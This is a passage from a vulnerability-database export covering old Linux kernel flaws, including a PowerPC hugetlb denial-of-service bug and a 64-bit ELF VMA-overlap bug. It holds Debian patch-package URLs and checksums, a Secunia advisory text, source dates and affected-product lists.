        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-m68k/kernel-image-2.6.8-q40_2.6.8-5sarge1_m68k.deb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2007-4308"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-headers-2.6-itanium-smp_2.6.8-15sarge1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/f/fai-kernels/fai-kernels_1.9.1sarge8.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-hppa/kernel-image-2.6.8-4-64-smp_2.6.8-7sarge1_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-alpha/kernel-headers-2.6.8-4_2.6.8-17sarge1_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2007-5093"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-sparc/kernel-build-2.6.8-4_2.6.8-16sarge1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/f/fai-kernels/fai-kernels_1.9.1sarge8_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2007-6151"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-hppa/kernel-headers-2.6.8-4-32_2.6.8-7sarge1_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2007-2525"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-headers-2.6.8-13-amd64-generic_2.6.8-17sarge1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-headers-2.6-itanium_2.6.8-15sarge1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-i386/kernel-image-2.6.8-i386_2.6.8-17sarge1.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.6.8/kernel-build-2.6.8-4-power4-smp_2.6.8-13sarge1_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2007-6063"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-s390/kernel-image-2.6.8-s390_2.6.8-6sarge1.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-m68k/kernel-image-2.6.8-mvme16x_2.6.8-5sarge1_m68k.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-sparc/kernel-headers-2.6.8-4-sparc32_2.6.8-16sarge1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-m68k/kernel-image-2.6.8-bvme6000_2.6.8-5sarge1_m68k.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-image-2.6.8-13-em64t-p4_2.6.8-17sarge1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-i386/kernel-headers-2.6.8-4-386_2.6.8-17sarge1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-sparc/kernel-headers-2.6.8-4_2.6.8-16sarge1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2007-3848"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-headers-2.6.8-13-amd64-k8_2.6.8-17sarge1_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2006-6058"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-source-2.6.8/kernel-doc-2.6.8_2.6.8-17sarge1_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-footbridge_2.6.18.dfsg.1-13etch3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all_2.6.18.dfsg.1-13etch3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-iop32x_2.6.18.dfsg.1-13etch3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-footbridge_2.6.18.dfsg.1-13etch3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-ixp4xx_2.6.18.dfsg.1-13etch3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-s3c2410_2.6.18.dfsg.1-13etch3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all-arm_2.6.18.dfsg.1-13etch3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5_2.6.18.dfsg.1-13etch3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-rpc_2.6.18.dfsg.1-13etch3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-s3c2410_2.6.18.dfsg.1-13etch3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-iop32x_2.6.18.dfsg.1-13etch3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-rpc_2.6.18.dfsg.1-13etch3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-ixp4xx_2.6.18.dfsg.1-13etch3_arm.deb"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-27101"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-000687"
      },
      {
        "db": "PACKETSTORM",
        "id": "59589"
      },
      {
        "db": "PACKETSTORM",
        "id": "59655"
      },
      {
        "db": "PACKETSTORM",
        "id": "63957"
      },
      {
        "db": "PACKETSTORM",
        "id": "59688"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200709-179"
      },
      {
        "db": "NVD",
        "id": "CVE-2007-3739"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-27101"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-000687"
      },
      {
        "db": "PACKETSTORM",
        "id": "59589"
      },
      {
        "db": "PACKETSTORM",
        "id": "59655"
      },
      {
        "db": "PACKETSTORM",
        "id": "63957"
      },
      {
        "db": "PACKETSTORM",
        "id": "59688"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200709-179"
      },
      {
        "db": "NVD",
        "id": "CVE-2007-3739"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2007-09-14T00:00:00",
        "db": "VULHUB",
        "id": "VHN-27101"
      },
      {
        "date": "2007-09-25T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2007-000687"
      },
      {
        "date": "2007-09-26T01:13:05",
        "db": "PACKETSTORM",
        "id": "59589"
      },
      {
        "date": "2007-09-28T01:33:30",
        "db": "PACKETSTORM",
        "id": "59655"
      },
      {
        "date": "2008-02-23T01:43:58",
        "db": "PACKETSTORM",
        "id": "63957"
      },
      {
        "date": "2007-09-30T06:28:14",
        "db": "PACKETSTORM",
        "id": "59688"
      },
      {
        "date": "2007-09-13T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-200709-179"
      },
      {
        "date": "2007-09-14T01:17:00",
        "db": "NVD",
        "id": "CVE-2007-3739"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-09-29T00:00:00",
        "db": "VULHUB",
        "id": "VHN-27101"
      },
      {
        "date": "2008-02-20T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2007-000687"
      },
      {
        "date": "2007-10-25T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-200709-179"
      },
      {
        "date": "2017-09-29T01:29:06.377000",
        "db": "NVD",
        "id": "CVE-2007-3739"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "local",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "59589"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200709-179"
      }
    ],
    "trust": 0.7
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "PowerPC for  Linux Kernel of  hugetlb Service disruption in  (DoS) Vulnerabilities",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-000687"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "resource management error",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-200709-179"
      }
    ],
    "trust": 0.6
  }
}

var-200501-0468
Vulnerability from variot

The 64 bit ELF support in Linux kernel 2.6 before 2.6.10, on 64-bit architectures, does not properly check for overlapping VMA (virtual memory address) allocations, which allows local users to cause a denial of service (system crash) or execute arbitrary code via a crafted ELF or a.out file. Linux Kernel is reported prone to a local denial-of-service vulnerability. Reportedly, this issue presents itself when a user creates a large Virtual Memory Area (VMA) that overlaps with arg pages during the exec() system call. Successful exploitation will lead to a denial-of-service condition in a vulnerable computer. No further details are available at this time. This issue will be updated as more information becomes available. Linux Kernel is the kernel of the open source operating system Linux.


Want to join the Secunia Security Team?

Secunia offers a position as a security specialist, where your daily work involves reverse engineering of software and exploit code, auditing of source code, and analysis of vulnerability reports.

http://secunia.com/secunia_security_specialist/


TITLE: Debian update for kernel-source-2.4.17

SECUNIA ADVISORY ID: SA20338

VERIFY ADVISORY: http://secunia.com/advisories/20338/

CRITICAL: Moderately critical

IMPACT: Exposure of system information, Exposure of sensitive information, Privilege escalation, DoS, System access

WHERE:

From remote

OPERATING SYSTEM: Debian GNU/Linux 3.0 http://secunia.com/product/143/

DESCRIPTION: Debian has issued an update for kernel-source-2.4.17. This fixes some vulnerabilities, which can be exploited by malicious, local users to gain knowledge of sensitive information, cause a DoS (Denial of Service), gain escalated privileges, and by malicious people to cause a DoS, and disclose potentially sensitive information.

-- Debian GNU/Linux 3.0 alias woody --

Source archives:

http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-hppa/kernel-image-2.4.17-hppa_32.5.dsc Size/MD5 checksum: 713 6ff55b14d3ae957c55bbed7fabf4c047 http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-hppa/kernel-image-2.4.17-hppa_32.5.tar.gz Size/MD5 checksum: 30437486 86601103169da686167972e5e560e3d4 http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-ia64/kernel-image-2.4.17-ia64_011226.18.dsc Size/MD5 checksum: 736 f97d95c6ecc26401f8f2fc2ead6cf421 http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-ia64/kernel-image-2.4.17-ia64_011226.18.tar.gz Size/MD5 checksum: 25419305 9bc354f889edd4964840475400b088b7 http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-s390/kernel-image-2.4.17-s390_2.4.17-2.woody.5.dsc Size/MD5 checksum: 800 d20db4ab99e311150734b70519cc31e9 http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-s390/kernel-image-2.4.17-s390_2.4.17-2.woody.5.tar.gz Size/MD5 checksum: 12283 f51a7e01941baca7010fb8c2f0f67fe3 http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-apus/kernel-patch-2.4.17-apus_2.4.17-6.dsc Size/MD5 checksum: 694 2d48f4cfa4917904b6c1f806ecc1bdb4 http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-apus/kernel-patch-2.4.17-apus_2.4.17-6.tar.gz Size/MD5 checksum: 491935 94638c0c03b6b163f46319e777d4aa71 http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-mips/kernel-patch-2.4.17-mips_2.4.17-0.020226.2.woody7.dsc Size/MD5 checksum: 805 b48cbc9c2cd59eee3a52f54cfa5356e0 http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-mips/kernel-patch-2.4.17-mips_2.4.17-0.020226.2.woody7.tar.gz Size/MD5 checksum: 1150966 6748462e7bce7c917e066e0594d42571 http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-s390/kernel-patch-2.4.17-s390_0.0.20020816-0.woody.4.dsc Size/MD5 checksum: 664 f49e9cba55a8a4b098e5dc522f2a07fc http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-s390/kernel-patch-2.4.17-s390_0.0.20020816-0.woody.4.tar.gz Size/MD5 checksum: 344642 3a488cc38ffc619bfff4bfbb75eff4cd http://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/kernel-source-2.4.17_2.4.17-1woody4.dsc Size/MD5 checksum: 609 4e0f66c1811cfb9e926c21566e55b202 http://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/kernel-source-2.4.17_2.4.17-1woody4.tar.gz Size/MD5 checksum: 29768549 bc1f8eab880a33bfe2ebeb3ef8b6557a

Architecture independent components:

http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-hppa/kernel-source-2.4.17-hppa_32.5_all.deb Size/MD5 checksum: 24455128 ed5362b12c6327295cd89027ff8e80ab http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-ia64/kernel-source-2.4.17-ia64_011226.18_all.deb Size/MD5 checksum: 24735538 cf9ddb702811464ac2dd2231512053f9 http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-mips/kernel-patch-2.4.17-mips_2.4.17-0.020226.2.woody7_all.deb Size/MD5 checksum: 1151866 6f2575f26e7800e1e7a7cafdaf02b3a6 http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-s390/kernel-patch-2.4.17-s390_0.0.20020816-0.woody.4_all.deb Size/MD5 checksum: 300202 0f5db53cdab20024b4a3a75bd0799b1a http://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/kernel-doc-2.4.17_2.4.17-1woody4_all.deb Size/MD5 checksum: 1708122 7d18878351662289ac0841e0ad8f10f4 http://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/kernel-source-2.4.17_2.4.17-1woody4_all.deb Size/MD5 checksum: 23972270 a0bf4a2796a9b49c36579166e6a72d62

HP Precision architecture:

http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-hppa/kernel-headers-2.4.17-hppa_32.5_hppa.deb Size/MD5 checksum: 3523044 63c790a70164e579c8bb3b8a08ea69b5 http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-hppa/kernel-image-2.4.17-32_32.5_hppa.deb Size/MD5 checksum: 2869994 e9e2be22d5fdf40f2e879570adc1132d http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-hppa/kernel-image-2.4.17-32-smp_32.5_hppa.deb Size/MD5 checksum: 3006192 cf53ac718c6ed26a59802e74c5926f00 http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-hppa/kernel-image-2.4.17-64_32.5_hppa.deb Size/MD5 checksum: 3029436 d0e0fd747af9ff7a3633ee9cc6b1f1e6 http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-hppa/kernel-image-2.4.17-64-smp_32.5_hppa.deb Size/MD5 checksum: 3170356 ca408698a580463da3a547b2f87006e4 http://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/mkcramfs_2.4.17-1woody3_hppa.deb Size/MD5 checksum: 16886 437018078d9d01e25702cf1a20c23414

Intel IA-64 architecture:

http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-ia64/kernel-headers-2.4.17-ia64_011226.18_ia64.deb Size/MD5 checksum: 3638280 b6cd4e0d4129b6f4d0734253818cd828 http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-ia64/kernel-image-2.4.17-itanium_011226.18_ia64.deb Size/MD5 checksum: 7026800 55e4cd610c06297c7132ce2aeb88d029 http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-ia64/kernel-image-2.4.17-itanium-smp_011226.18_ia64.deb Size/MD5 checksum: 7172892 a66f94c18d8ee4354e9446655837c72a http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-ia64/kernel-image-2.4.17-mckinley_011226.18_ia64.deb Size/MD5 checksum: 7014470 d99cc0f293c747a295230de934328007 http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-ia64/kernel-image-2.4.17-mckinley-smp_011226.18_ia64.deb Size/MD5 checksum: 7165570 997a9dbf17821067de6ceb65548e7c2b http://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/mkcramfs_2.4.17-1woody4_ia64.deb Size/MD5 checksum: 21616 1eab80187061fbd304b6328533d7dc33

IBM S/390 architecture:

http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-s390/kernel-headers-2.4.17_2.4.17-2.woody.5_s390.deb Size/MD5 checksum: 3379418 74817217abf90896eb63d6c6792839fe http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-s390/kernel-image-2.4.17-s390_2.4.17-2.woody.5_s390.deb Size/MD5 checksum: 1346190 39433c757763336b6c14bf0d00652596 http://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/mkcramfs_2.4.17-1woody3_s390.deb Size/MD5 checksum: 16404 9cfcf10a2a2ef99bbb009a650cddd227

PowerPC architecture:

http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-apus/kernel-headers-2.4.17-apus_2.4.17-6_powerpc.deb Size/MD5 checksum: 3409712 698750e3998ee3792db43f445a8a8d96 http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-apus/kernel-image-2.4.17-apus_2.4.17-6_powerpc.deb Size/MD5 checksum: 2211146 103890e43508a5913a10ff8be80e9cdc http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-apus/kernel-image-apus_2.4.17-6_powerpc.deb Size/MD5 checksum: 4602 31ef3f45675fc13836337dee97486e20 http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-apus/kernel-patch-2.4.17-apus_2.4.17-6_powerpc.deb Size/MD5 checksum: 490842 799441a4e49b88f780353d7aff9f29d2 http://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/mkcramfs_2.4.17-1woody3_powerpc.deb Size/MD5 checksum: 16280 4e54c040bc83523d8122287bab6df7a5

Big endian MIPS architecture:

http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-mips/kernel-headers-2.4.17_2.4.17-0.020226.2.woody7_mips.deb Size/MD5 checksum: 3523520 45f001c255a3a66f22148d84d035abb1 http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-mips/kernel-image-2.4.17-r4k-ip22_2.4.17-0.020226.2.woody7_mips.deb Size/MD5 checksum: 2045436 c840c6ff8c9e3ab455d38021d09a391d http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-mips/kernel-image-2.4.17-r5k-ip22_2.4.17-0.020226.2.woody7_mips.deb Size/MD5 checksum: 2045226 709ccbc6754644fa448c93058f0df504 http://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/mkcramfs_2.4.17-1woody3_mips.deb Size/MD5 checksum: 16556 019623b1dbc75bff84d7f056435dc6db

Little endian MIPS architecture:

http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-mips/kernel-headers-2.4.17_2.4.17-0.020226.2.woody7_mipsel.deb Size/MD5 checksum: 3522422 2118440d1658730fd93f47867848573c http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-mips/kernel-image-2.4.17-r3k-kn02_2.4.17-0.020226.2.woody7_mipsel.deb Size/MD5 checksum: 2200968 63bc732deee6df19b83f10a50485a476 http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-mips/kernel-image-2.4.17-r4k-kn04_2.4.17-0.020226.2.woody7_mipsel.deb Size/MD5 checksum: 2195278 697eb9b05f765c332eca175284eb24b8 http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-mips/mips-tools_2.4.17-0.020226.2.woody7_mipsel.deb Size/MD5 checksum: 17836 61df1f292dccb4e64cb956a629f729fc http://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/mkcramfs_2.4.17-1woody3_mipsel.deb Size/MD5 checksum: 16558 f8382b01aca2c535988b5ab5709dae90

Alpha architecture:

http://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/mkcramfs_2.4.17-1woody3_alpha.deb Size/MD5 checksum: 17180 7d1cf8fb24431c01f45fadf7becb6d2e

ARM architecture:

http://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/mkcramfs_2.4.17-1woody3_arm.deb Size/MD5 checksum: 15878 fcf97ed103c205699fb5396c3a49e293

Intel IA-32 architecture:

http://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/mkcramfs_2.4.17-1woody3_i386.deb Size/MD5 checksum: 15518 2e7d50090a469a84ef7f3ae8aa97b85f

Motorola 680x0 architecture:

http://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/mkcramfs_2.4.17-1woody3_m68k.deb Size/MD5 checksum: 15368 41a11620bf7ea34b15742ccf59ff6895

Sun Sparc architecture:

http://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/mkcramfs_2.4.17-1woody3_sparc.deb Size/MD5 checksum: 18356 71b076d3eeff837bfb54a7f538b11b58

ORIGINAL ADVISORY: http://www.us.debian.org/security/2006/dsa-1082

OTHER REFERENCES: SA10533: http://secunia.com/advisories/10533/

SA11464: http://secunia.com/advisories/11464/

SA11861: http://secunia.com/advisories/11861/

SA11943: http://secunia.com/advisories/11943/

SA13232: http://secunia.com/advisories/13232/

SA13469: http://secunia.com/advisories/13469/

SA13126: http://secunia.com/advisories/13126/

SA13308: http://secunia.com/advisories/13308/

SA13627: http://secunia.com/advisories/13627/

SA13756: http://secunia.com/advisories/13756/

SA13493: http://secunia.com/advisories/13493/

SA13822: http://secunia.com/advisories/13822/

SA14295: http://secunia.com/advisories/14295/

SA14570: http://secunia.com/advisories/14570/

SA13784: http://secunia.com/advisories/13784/


About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities.

Subscribe: http://secunia.com/secunia_security_advisories/

Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/

Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.


Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org


Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-200501-0468",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "s8500",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "avaya",
        "version": "r2.0.1"
      },
      {
        "model": "s8700",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "avaya",
        "version": "r2.0.0"
      },
      {
        "model": "s8300",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "avaya",
        "version": "r2.0.0"
      },
      {
        "model": "s8500",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "avaya",
        "version": "r2.0.0"
      },
      {
        "model": "s8700",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "avaya",
        "version": "r2.0.1"
      },
      {
        "model": "s8300",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "avaya",
        "version": "r2.0.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.28"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.27"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.26"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.25"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.24"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.23"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.22"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.21"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.20"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.19"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.6"
      },
      {
